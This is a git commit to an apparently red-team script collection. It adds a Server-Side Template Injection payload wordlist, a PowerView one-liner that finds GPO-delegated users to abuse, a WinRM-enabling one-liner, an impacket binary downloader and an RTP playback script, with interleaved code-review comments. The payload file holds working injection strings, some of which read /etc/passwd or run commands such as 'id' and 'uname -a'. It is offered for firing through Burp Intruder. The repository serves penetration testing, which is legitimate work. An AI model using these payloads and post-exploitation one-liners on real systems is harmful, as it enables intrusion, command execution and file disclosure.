Dropped a bunch of various scripts.

This commit is contained in:
mb 2019-01-29 05:19:12 -05:00
parent e839e64db2
commit 1bf88bef0b
9 changed files with 105 additions and 1 deletion


@ -5,4 +5,6 @@
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da)) - **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98)) - **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98))
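Review bot: the new `playRTPStream.sh` entry links its gist as a bare `[gist](...)` while the neighbouring entries wrap it as `([gist](...))`; match the existing style. The description also promises dumping streams into .wav files, but the script added in this commit reports the output-file path as "Not implemented at the moment", so until that part is finished the README should say that only listing streams and playing them in VLC works.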

others/playRTPStream.sh (Normal file, 45 lines added)

@ -0,0 +1,45 @@
#!/bin/bash
rtpdump_bin=/home/user/tools/rtpdump/rtpdump
if (( $# < 2 )); then
echo
echo This script tries to extract RTP streams from PCAP file using
echo https://github.com/hdiniz/rtpdump
echo utility and passing that stream to VLC player, or to output file.
echo
#echo "Usage: playStream.sh <file> <streamNum> [outfile]"
echo "Usage: playStream.sh <file> <streamNum>"
echo
echo " file - pcap file to process."
echo " streamNum - number of stream to play, or '-l' to list them."
#echo " outfile - (optional) path to output file where to dump that stream."
echo
exit 1
fi
file=$1
num=$2
vlc_bin=cvlc
if [ "$num" == "-l" ]; then
$rtpdump_bin streams $file
else
if (( $# > 2 )); then
echo "[ERROR] Not implemented at the moment."
#outfile=$3
#echo "[Step 1]: Dumping RTP stream ($num) to file ($outfile)"
#nc -nlp 4444 127.0.0.1 > $outfile &
#echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
#echo "[Step 2]: File: $outfile written."
else
echo "[Step 1]: Starting VLC on 0.0.0.0:4444"
$vlc_bin rtp://@0.0.0.0:4444 2> /dev/null &disown;
echo "[Step 2]: Playing RTP stream ($num) on 0.0.0.0:4444"
echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
pkill vlc
fi
fi
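Review bot: `rtpdump_bin=/home/user/tools/rtpdump/rtpdump` is hard-coded to one user's home directory and never checked for existence, so on any other machine the script fails with a bare "No such file"; read it from an environment variable or `command -v rtpdump` and exit with a clear message when it is missing. Two smaller points in the play branch: VLC is started on `rtp://@0.0.0.0:4444`, which listens on every interface, although the stream is only ever sent locally, so `127.0.0.1` on both the VLC side and the `--host` side avoids leaving an open UDP listener on the engagement box; and the closing `pkill vlc` kills every VLC the user has open, not just the one this script launched, so keep `$!` after the `&` and kill that PID. Also quote `"$file"` in both `$rtpdump_bin` calls (a PCAP path with spaces breaks otherwise), and the usage text says `playStream.sh` while the file is `playRTPStream.sh`.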


@ -0,0 +1 @@
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | %{$acl=$_; $a=[string]$acl.IdentityReference; $b=$a.Substring($a.IndexOf("\")+1); $c=$null; $c=Get-NetUser "$b"; If ($c -ne $null -And $c.userprincipalname -like "*") { $dn=$acl.ObjectDN; If($dn -match 'CN=({[0-9A-F\-]+}),.+'){ $cn=$matches[1]; $gpo=Get-NetGPO -GPOname "$cn"; Write-Output "User: $b / $($c.userprincipalname) - delegated to GPO: $($gpo.displayname)"}}}
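Review bot: the ACL loop never inspects `ActiveDirectoryRights`, so every ACE on every GPO whose principal resolves to a user is reported as "delegated", including plain read/apply entries; filter for rights that actually allow editing the object (`WriteProperty`, `GenericWrite`, `GenericAll`, `WriteDacl`, `WriteOwner`) before printing. Two further gaps: `Get-NetUser "$b"` returns nothing for a group principal, so rights granted through groups (the common case) are silently dropped, and `$c.userprincipalname -like "*"` only tests that the UPN is non-empty, which reads like an accident; `$null -ne $c` with `$null` on the left is the usual PowerShell form of that check.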


@ -66,6 +66,8 @@ Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results. Loaded $UserHunterShowAll results.
``` ```
- **`Find-GPODelegatedUsers.ps1`** - One-liner for finding GPO Delegated users that can Edit Settings of that GPO and thus could be used to Abuse GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). [gist](https://gist.github.com/mgeeky/5843df09607123772a61e782a6406d54)
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb)) - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
Example output **not minimized**: Example output **not minimized**:
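Review bot: the description claims the one-liner finds users that "can Edit Settings of that GPO", but the script added in this commit does not filter ACEs by rights, so the README overstates what it reports; either the wording or the script should change. Formatting: the neighbouring entries wrap the link as `([gist](...))`, this one does not.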

web/payloads/README.md (Normal file, 4 lines added)

@ -0,0 +1,4 @@
## Web Applications penetration testing related PAYLOADS that are actually useful
- **`Server-Side-Template-Injections.txt`** - Various Server-Side Template Injection static payloads, targeting couple of various templating implementations (also some of the Client-Side ones like in AngularJS). The evaluated expression to look/grep for is: **1868686868**. Use it with Burp Intruder's Grep functionality, or simply look out for that pattern while hanging around the application. ([gist](https://gist.github.com/mgeeky/2b660ab8d3946eec519731ed9ec5d25b))
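Review bot: state where the canary comes from (36692 * 50929 = 1868686868) so a reader knows the grep only matches the multiplication probes and that changing the numbers means changing the grep. The README should also warn that not every line in the wordlist is a detection probe: several entries read files or execute commands (`File.open('/etc/passwd')`, `ex("id")`, `getFilter("uname+-a")`) and should not be fired blindly through Intruder against a production target, and several others (`666 * 666`, the `aaaa{*cccc*}bbbb` concatenations, `alert(1)`) never produce 1868686868 at all, so they need a different check than the grep.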


@ -0,0 +1,45 @@
##### LOOK FOR 1868686868
<%= 666 * 666 %>
<%= File.open('/etc/passwd').read %>
${36692*50929}
aaaaaaaaaaaaaaaaaaaaaa{*cccccccccccccccccccccccccccccccc*}bbbbbbbbbbbbbbbbbbbbbbbbb
${"aaaaaaaaaaaaaaaaaaaaaa".join("bbbbbbbbbbbbbbbbbbbbbbbbb")}
${36692*'50929'}
${{36692*50929}}
${{36692*'50929'}}
{{36692*'50929'}}
{{36692*50929}}
[[36692*50929]]
${{36692*50929}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
{{self}}
{php}echo 36692*50929;{/php}
{{velocity}}36692*50929;{{/velocity}}
{{python}}36692*50929;{{/python}}
<#assign
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
= root
= 36692 * 50929
<% x=36692*50929 %>${x}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
aaaaaaaaaaaaaaaaaaaaaa{{''.__class__.__mro__[2].__subclasses__()[233]}}bbbbbbbbbbbbbbbbbbbbbbbbb
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("uname+-a")}}
$class
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo.class
${fffffffffffffffffffffff}
{{ffffffffffffffffffff}}
[[ffffffffffffffffffffff]]
{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
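Review bot: the FreeMarker payload is split over two lines (`<#assign` followed by `ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}`), so a one-payload-per-line wordlist loaded into Intruder sends two broken fragments; put it on a single line. `${{36692*50929}}` appears twice and one copy can go. Consider grouping the harmless detection probes separately from the exploitation lines (`File.open`, `Execute`, `registerUndefinedFilterCallback("exec")`, `__subclasses__()[40]('/etc/passwd')`), and the subclass indices `[40]` and `[233]` are specific to one Python build and will point at a different class elsewhere, which deserves a comment like the existing `# ... = File class` line.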


@ -0,0 +1 @@
Set-ExecutionPolicy -ExecutionPolicy Bypass ; Start-Service winrm ; Get-NetConnectionProfile | Set-NetConnectionProfile -NetworkCategory Private ; Enable-PSRemoting -SkipNetworkProfileCheck -Force ; winrm quickconfig ; Configure-SMRemoting -Force -Enable
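Review bot: `Set-ExecutionPolicy -ExecutionPolicy Bypass` has no `-Force`, so on an interactive console it prompts for confirmation and the "forceful" script stalls at its first command; add `-Force`, and `-Scope` if changing the machine-wide policy (the default `LocalMachine` scope) is not intended. The commands are chained with `;`, so a failure in any of them (no elevation, WinRM service not installed) does not stop the rest and nothing reports whether remoting is actually up; finish with `Test-WSMan -ComputerName localhost` or check `(Get-Service winrm).Status`. Also, `Set-NetConnectionProfile -NetworkCategory Private` is applied to every adapter and changes firewall behaviour well beyond WinRM, which the README entry should mention.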


@ -3,6 +3,8 @@
- **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794)) - **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
- **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9)) - **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
Steps are following: Steps are following:
@ -16,6 +18,7 @@
After those steps - the GlobalProtect will disable itself cleanly. After those steps - the GlobalProtect will disable itself cleanly.
From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service). From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service).
- **`impacket-binaries.sh`** - Simple one-liner that downloads all of the Windows EXE impacket binaries put out in [Impacket Binaries](https://github.com/ropnop/impacket_static_binaries) repo. [gist](https://gist.github.com/mgeeky/2f990f14f1e7cf78fce21b8761234604)
- **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9)) - **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9))
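Review bot: both new entries (`Force-PSRemoting.ps1`, `impacket-binaries.sh`) link their gists as a bare `[gist](...)` while the surrounding entries use `([gist](...))`; align the formatting. The `Force-PSRemoting.ps1` line should also say that the script needs an elevated shell and switches every network profile to Private, since "forcefully" hides that side effect.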


@ -0,0 +1 @@
curl -s https://api.github.com/repos/ropnop/impacket_static_binaries/releases/latest | grep "browser_download_url.*exe" | cut -d : -f 2,3 | tr -d \" | wget -qi -
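Review bot: the pipeline has no error handling: `curl -s` hides failures, and once the unauthenticated API rate limit is hit the response is an error document, `grep` matches nothing and `wget -qi -` exits silently with nothing downloaded. Use `curl -fsS` so HTTP errors surface, and parse the JSON with `jq -r '.assets[].browser_download_url | select(endswith(".exe"))'` instead of `grep | cut | tr`, which depends on the exact key/value layout of the response. Since these are Windows executables pulled from a third-party release straight onto the engagement box, also fetch and verify the release checksums where the project publishes them.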